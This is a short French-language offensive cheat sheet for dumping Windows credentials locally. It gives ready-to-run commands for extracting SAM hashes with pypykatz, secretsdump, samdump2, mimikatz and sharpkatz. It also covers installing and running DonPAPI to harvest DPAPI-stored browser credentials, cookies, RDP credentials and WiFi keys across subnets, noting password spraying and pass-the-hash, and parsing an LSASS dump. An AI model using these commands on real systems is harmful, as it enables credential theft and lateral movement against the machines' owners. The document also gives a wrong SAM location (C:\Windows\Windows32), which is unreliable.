Extraction local

Base SAM

La base SAM se situe dans C:\Windows\Windows32. Si l’utilisateur est en mesure d’extraire les fichiers SAM et SYSTEM, il est possible d’extraire les hashes de mot de passe.

pypykatz registry --sam SAM SYSTEM

secretsdump.py -sam SAM -system SYSTEM LOCAL

samdump2 SYSTEM SAM > hashes.txt

mimikatz
privilege::debug
token::elevate
lsadump::sam

sharpkatz.exe --Command logonpasswords

DPAPI

DonPAPI

DonPAPI est un outil permettant de dumper rapidement des identifiants ou données stockées dans la DPAPI. Il permet entre autres de récupérer les outils suivants:

Identifiants et cookies navigateur (firefox, chrome, edge, etc.)
Identifiants RDP
Base de données mRemoteNG
Clés WiFi

L’avantage est que l’outil s’exécute sur une plage IP et permet de scanner rapidement un sous-réseau via du password spraying

Installation

git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
python3 -m pip install -r requirements.txt
python3 DonPAPI.py

Usage

DonPAPI domain/user:password@target

La target peut être une IP ou un sous-réseau.

L’outil propose aussi d’utiliser les techniques de pass-the-hash ou pass-the-ticket.

LSASS

Pypykatz

pypykatz lsa minidump lsass.dmp